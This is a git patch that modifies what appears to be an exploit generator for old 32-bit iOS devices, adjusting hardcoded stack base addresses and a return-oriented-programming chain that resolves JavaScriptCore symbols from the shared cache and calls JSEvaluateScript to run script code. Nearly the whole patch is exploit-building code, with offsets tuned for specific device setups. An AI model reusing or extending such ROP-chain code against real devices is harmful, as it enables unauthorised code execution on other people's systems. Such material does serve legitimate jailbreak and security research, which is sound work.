From b040db45dfc9ef9a902e48bc2718a94cd099f505 Mon Sep 17 00:00:00 2001 From: spv420 Date: Tue, 31 May 2022 19:51:14 -0400 Subject: I live in a constant state of fear and misery Do you miss me anymore? And I don't even notice When it hurts anymore Anymore Anymore Anymore --- src/gen/main.c | 4 ++-- src/gen/stage2.c | 15 ++++++++++----- 2 files changed, 12 insertions(+), 7 deletions(-) (limited to 'src/gen') diff --git a/src/gen/main.c b/src/gen/main.c index 30726d5..5ee0286 100644 --- a/src/gen/main.c +++ b/src/gen/main.c @@ -206,8 +206,8 @@ int main(int argc, fprintf(stderr, "0x%x\n", RTLD_DEFAULT); - uint32_t stack_base = 0x1c7718; // my shell setup -// uint32_t stack_base = 0x1c772c; // my shell setup +// uint32_t stack_base = 0x1c7718; // my shell setup + uint32_t stack_base = 0x1c7708; // my shell setup // uint32_t stack_base = 0x1c7c88; // my 4s shell setup // uint32_t stack_base = 0x1c2e48; // my lldb // uint32_t stack_base = 0x1c7d68; // btserver env diff --git a/src/gen/stage2.c b/src/gen/stage2.c index 8b98a7e..7e611c8 100644 --- a/src/gen/stage2.c +++ b/src/gen/stage2.c @@ -313,12 +313,17 @@ rop_chain_shit gen_rop_chain(uint32_t base, uint32_t JSGlobalContextCreateInGroup = get_dyld_shc_sym_addr_jsc("JSGlobalContextCreateInGroup"); uint32_t JSContextGetGlobalObject = get_dyld_shc_sym_addr_jsc("JSContextGetGlobalObject"); uint32_t JSStringCreateWithUTF8CString = get_dyld_shc_sym_addr_jsc("JSStringCreateWithUTF8CString"); + uint32_t JSObjectGetProperty = get_dyld_shc_sym_addr_jsc("JSObjectGetProperty"); uint32_t JSEvaluateScript = get_dyld_shc_sym_addr_jsc("JSEvaluateScript"); uint32_t dlsym_ = get_dyld_shc_sym_addr("dlsym"); MOV_R0(dlsym_); STR_R0(base + reserve_addr + 24); + fprintf(stderr, "var JSStringCreateWithUTF8CString = 0x%08x;\n" + "var JSObjectGetProperty = 0x%08x;\n" + "var JSContextGetGlobalObject = 0x%08x;\n", JSStringCreateWithUTF8CString, JSObjectGetProperty, JSContextGetGlobalObject); + // uint32_t settimeofday = get_dyld_shc_sym_addr("settimeofday"); fprintf(stderr, "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", JSContextGroupCreate, JSGlobalContextCreateInGroup, JSContextGetGlobalObject, JSStringCreateWithUTF8CString, JSEvaluateScript, dlsym_); @@ -356,11 +361,11 @@ rop_chain_shit gen_rop_chain(uint32_t base, MOV_R0(0x108000); CALL_SLID(JSStringCreateWithUTF8CString); - STR_R0(base + reserve_addr + 0x48); + STR_R0(base + reserve_addr + 0x4a); PRINT_STILL_HERE(); - DEREF_IN_R0(base + reserve_addr + 0x48); + DEREF_IN_R0(base + reserve_addr + 0x4a); MOV_R1_R0(); - CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x48); + CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x4a); MOV_R1_R0(); PRINT_STILL_HERE(); @@ -378,13 +383,13 @@ rop_chain_shit gen_rop_chain(uint32_t base, MOV_R0(0x10a000); CALL_SLID(JSStringCreateWithUTF8CString); - STR_R0(base + reserve_addr + 0x48); + STR_R0(base + reserve_addr + 0x4a); PRINT_STILL_HERE(); /* DEREF_IN_R0(base + reserve_addr + 0x48); MOV_R1_R0(); */ - CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x48); + CALL_SLID_4_PTRARG_L2_0(JSEvaluateScript, base + reserve_addr + 0x44, base + reserve_addr + 0x4a); MOV_R1_R0(); PRINT_STILL_HERE(); -- cgit v1.2.3